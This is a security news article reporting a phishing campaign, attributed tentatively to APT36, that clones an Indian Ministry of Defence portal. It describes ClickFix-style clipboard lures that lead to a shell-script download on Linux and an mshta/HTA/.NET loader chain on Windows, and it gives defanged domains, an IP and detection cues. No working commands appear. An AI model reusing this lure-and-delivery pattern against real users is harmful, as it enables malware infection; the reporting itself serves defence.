A sophisticated phishing campaign spoofing India’s Ministry of Defence has been uncovered. The operation, which mirrors tactics seen in previous ClickFix-style attacks, appears to be the work of the Pakistan-linked threat group APT36 (Transparent Tribe).
It uses cloned government branding and cross-platform malware delivery to target unsuspecting users.
Deceptive Infrastructure Mimics Official Government Portal
Researchers at hunt.io discovered a fake domain (email.gov.in.drdosurvey[.]info) designed to closely resemble the official Ministry of Defence press release portal. The malicious site mimicked the layout and structure of the real press archive, but with a critical difference: only the link for March 2025 was active, while others displayed a static “No Data” message.
An analysis of the cloned page’s source code revealed it had been created using HTTrack, a website copying tool, with metadata indicating the site was cloned in early March 2025.
ClickFix-Style Infection Chain Targets Windows and Linux
Clicking the sole active link initiated a tailored infection path depending on the visitor’s operating system:
Linux users were directed to a CAPTCHA-themed page displaying a blue button labeled “I’m not a rebot”, a suspicious misspelling that may be designed to bypass automated detection. Clicking the button copied a malicious shell command to the clipboard.
If pasted into a terminal, it downloaded and executed a shell script (mapeal.sh) from a likely compromised domain: trade4wealth[.]in. Though the script’s behavior was minimal (downloading and opening a JPEG image) it demonstrated intent to deceive and possibly lay the groundwork for further activity.
Windows users were served a different lure: a full-screen “For Official Use Only” warning overlayed on a blurred image of the legitimate yoga.ayush.gov.in portal. Clicking “Continue” triggered a JavaScript function that silently copied a command to launch mshta.exe, which executed a remote HTA (HTML Application) file packed with obfuscated JavaScript.
The payload retrieved a .NET-based malware loader that communicated with the IP address 185.117.90[.]212, associated with the spoofed domain email.gov.in.avtzyu[.]store.
While the malware executed in the background, victims were shown a cloned PDF press release, which was likely to reinforce the illusion of legitimacy and reduce suspicion.
Hallmarks of APT36 Activity
Though attribution is not definitive, the campaign bears a strong resemblance to known APT36 tactics, including:
- Cloned Indian government branding and domains
- Use of HTA files and .NET-based malware
- Clipboard-based command execution
- Decoy documents themed on Indian institutions
- Infrastructure leveraging Namecheap registrations and registrar-servers[.]com nameservers
APT36, a Pakistan-aligned threat actor, has historically focused on Indian government, military, and diplomatic targets. The group frequently uses social engineering, spoofed government websites, and malware-laced documents to gain initial access.
A Growing Trend of Infrastructure Spoofing
This operation continues a broader trend of infrastructure spoofing in targeted phishing campaigns, particularly those involving ClickFix-style payload delivery. Key characteristics defenders should monitor include:
- Misspelled CAPTCHAs (“rebot”) and typos in overlays (“officia use only”)
- Commands delivered via clipboard instead of direct download
- Domains spoofing official Indian subdomains (email.gov.in) appended to attacker-controlled TLDs
- Payloads hosted in typical-looking web asset directories (/assets/js/, /css/default/)
Though the techniques used in this campaign might not be technically advanced, they are a calculated deception. Using visual mimicry, clipboard trickery, and cross-platform targeting, the actors aim to lower defenses and increase malware execution rates.
To defend against threats of this nature, watch for any subtle signs, particularly fake government domains, shallow clones of trusted sites, and payloads embedded in seemingly harmless directories.
Information Security Buzz News Editor
Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications.
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.